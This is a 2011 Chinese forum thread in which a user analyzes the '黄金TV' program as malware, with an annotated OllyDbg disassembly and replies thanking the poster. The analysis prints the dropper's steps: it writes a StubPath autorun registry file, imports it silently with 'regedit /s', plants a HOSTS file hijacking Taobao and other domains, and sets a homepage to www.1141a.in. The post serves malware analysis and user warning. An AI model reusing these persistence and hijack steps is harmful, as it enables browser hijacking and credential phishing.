网站 › 『病毒分析区』 › 黄金TV内恶意行为分析

lkou 发表于 2011-3-24 22:21

黄金TV内恶意行为分析

本帖最后由 lkou 于 2011-3-24 22:34 编辑

看到有人举报黄金TV有恶意行为，具体表现为：主页重定向，修改HOST等

简单分析一下好了

压缩包解压，得到黄金版TV.exe和uio.dll（这个是隐藏文件，分析过无问题）

OD反一下黄金版TV.exe

可以找到如下恶意行为


0040179F/$55            PUSH EBP
004017A0|.8BEC          MOV EBP,ESP
004017A2|.81EC 04000000 SUB ESP,4
004017A8|.6A 00         PUSH 0
004017AA|.6A 00         PUSH 0
004017AC|.6A 00         PUSH 0
004017AE|.68 02000080   PUSH 80000002
004017B3|.6A 00         PUSH 0
004017B5|.68 00000000   PUSH 0
004017BA|.68 04000080   PUSH 80000004
004017BF|.6A 00         PUSH 0
004017C1|.68 6BC64000   PUSH 黄金版TV.0040C66B                      ;uio.dll
004017C6|.68 03000000   PUSH 3
004017CB|.BB C0020000   MOV EBX,2C0
004017D0|.E8 8B0B0000   CALL 黄金版TV.00402360         ；加载uio.dll
004017D5|.83C4 28       ADD ESP,28
004017D8|.68 01030080   PUSH 80000301
004017DD|.6A 00         PUSH 0
004017DF|.68 D0070000   PUSH 7D0
004017E4|.68 01000000   PUSH 1
004017E9|.BB 7C060000   MOV EBX,67C
004017EE|.E8 5D0C0000   CALL 黄金版TV.00402450
004017F3|.83C4 10       ADD ESP,10
004017F6|.68 04000080   PUSH 80000004
004017FB|.6A 00         PUSH 0
004017FD|.68 73C64000   PUSH 黄金版TV.0040C673                      ;D:\Program\
00401802|.68 01000000   PUSH 1
00401807|.BB 34020000   MOV EBX,234
0040180C|.E8 4F0C0000   CALL 黄金版TV.00402460                  ；新建D:\Program文件夹
00401811|.83C4 10       ADD ESP,10
00401814|.68 05000080   PUSH 80000005
00401819|.6A 00         PUSH 0
0040181B|.68 7FC64000   PUSH 黄金版TV.0040C67F
00401820|.68 04000080   PUSH 80000004
00401825|.6A 00         PUSH 0
00401827|.68 97CA5600   PUSH 黄金版TV.0056CA97                      ;D:\Program\Thunder.exe
0040182C|.68 02000000   PUSH 2
00401831|.BB 6C020000   MOV EBX,26C
00401836|.E8 550C0000   CALL 黄金版TV.00402490                     ；在该文件夹下生成Thunder.exe
0040183B|.83C4 1C       ADD ESP,1C
0040183E|.6A 01         PUSH 1
00401840|.68 00000000   PUSH 0
00401845|.B8 97CA5600   MOV EAX,黄金版TV.0056CA97                   ;D:\Program\Thunder.exe
0040184A|.8945 FC       MOV DWORD PTR SS:,EAX
0040184D|.8D45 FC       LEA EAX,DWORD PTR SS:
00401850|.50            PUSH EAX
00401851|.68 04000000   PUSH 4
00401856|.E8 D8000000   CALL 黄金版TV.00401933                        ；执行
0040185B|.8B5D FC       MOV EBX,DWORD PTR SS:
0040185E|.85DB          TEST EBX,EBX
00401860|.74 09         JE SHORT 黄金版TV.0040186B
00401862|.53            PUSH EBX
00401863|.E8 7F050000   CALL 黄金版TV.00401DE7
00401868|.83C4 04       ADD ESP,4
0040186B|>68 01030080   PUSH 80000301
00401870|.6A 00         PUSH 0
00401872|.68 D0070000   PUSH 7D0
00401877|.68 01000000   PUSH 1
0040187C|.BB 7C060000   MOV EBX,67C
00401881|.E8 CA0B0000   CALL 黄金版TV.00402450
00401886|.83C4 10       ADD ESP,10
00401889|.68 05000080   PUSH 80000005
0040188E|.6A 00         PUSH 0
00401890|.68 AECA5600   PUSH 黄金版TV.0056CAAE
00401895|.68 04000080   PUSH 80000004
0040189A|.6A 00         PUSH 0
0040189C|.68 3ECC5600   PUSH 黄金版TV.0056CC3E                      ;C:\hh.reg
004018A1|.68 02000000   PUSH 2
004018A6|.BB 6C020000   MOV EBX,26C
004018AB|.E8 E00B0000   CALL 黄金版TV.00402490                      ；c盘下生成hh.reg
004018B0|.83C4 1C       ADD ESP,1C
004018B3|.68 01030080   PUSH 80000301
004018B8|.6A 00         PUSH 0
004018BA|.68 01000000   PUSH 1
004018BF|.68 02000080   PUSH 80000002
004018C4|.6A 00         PUSH 0
004018C6|.68 00000000   PUSH 0
004018CB|.68 04000080   PUSH 80000004
004018D0|.6A 00         PUSH 0
004018D2|.68 48CC5600   PUSH 黄金版TV.0056CC48                      ;regedit /s C:\hh.reg
004018D7|.68 03000000   PUSH 3
004018DC|.BB C0020000   MOV EBX,2C0
004018E1|.E8 7A0A0000   CALL 黄金版TV.00402360                     ；导入注册表
004018E6|.83C4 28       ADD ESP,28
004018E9|.68 01030080   PUSH 80000301
004018EE|.6A 00         PUSH 0
004018F0|.68 D0070000   PUSH 7D0
004018F5|.68 01000000   PUSH 1
004018FA|.BB 7C060000   MOV EBX,67C
004018FF|.E8 4C0B0000   CALL 黄金版TV.00402450
00401904|.83C4 10       ADD ESP,10
00401907|.68 04000080   PUSH 80000004
0040190C|.6A 00         PUSH 0
0040190E|.68 3ECC5600   PUSH 黄金版TV.0056CC3E                      ;C:\hh.reg
00401913|.68 01000000   PUSH 1
00401918|.BB 44020000   MOV EBX,244
0040191D|.E8 0E0C0000   CALL 黄金版TV.00402530
00401922|.83C4 10       ADD ESP,10
00401925|.B8 00000000   MOV EAX,0
0040192A|.E9 00000000   JMP 黄金版TV.0040192F
0040192F|>8BE5          MOV ESP,EBP
00401931|.5D            POP EBP
00401932\.C3            RETN
hh.reg的内容为

Windows Registry Editor Version 5.00

"StubPath"="D:\\Program\\Thunder.exe"


Thunder.exe这个文件给arm加壳了，放到沙盘看看

沙盘最终返回结果是在WINDOWS\System32\Drivers\etc目录下生成HOSTS，内有大量域名劫持（包括劫持了2个淘宝域名）

然后在D盘下生成ga3.reg
内容为


@=hex(2):63,00,3a,00,5c,00,70,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,66,\
00,69,00,6c,00,65,00,73,00,5c,00,69,00,6e,00,74,00,65,00,72,00,6e,00,65,00,\
74,00,20,00,65,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,69,00,65,\
00,78,00,70,00,6c,00,6f,00,72,00,65,00,2e,00,65,00,78,00,65,00,20,00,77,00,\
77,00,77,00,2e,00,31,00,31,00,34,00,31,00,61,00,2e,00,69,00,6e,00,00,00

上面的HEX代表c:\program files\internet explorer\iexplore.exe www.1141a.in
由于Thunder.exe是一个inno安装程序，所以可以完全判定ga3.reg会被导入到注册表




附件传上来，大家看看玩玩好了

笨潴 发表于 2011-3-24 22:23

本帖最后由 笨潴 于 2011-3-24 22:24 编辑

Lkou手脚真快啊

今夕望月 发表于 2011-3-24 22:30

果断强人

ak2500 发表于 2011-3-24 22:32

{:1_937:}我用那个东西看了一会呢

cjcworld 发表于 2011-3-24 22:44

我也看了一会儿。。谢谢lZ

lhfi22 发表于 2011-3-24 22:52

建议用过次软件的哥们不要登陆淘宝~更不要登陆自己的帐号！！！！
谢谢LZ给与这么快的回复！！！

svcy 发表于 2011-3-24 23:21

还好，我从不看电视的{:1_914:}

cuihaojun168 发表于 2011-3-24 23:28

感谢楼主。。

ShellYu 发表于 2011-3-24 23:29

楼主高手啊。
幸好没用{:1_909:}

lyq_superior 发表于 2011-3-24 23:37

真是高手，好厉害啊！刚好学习下啊!

查看完整版本: 黄金TV内恶意行为分析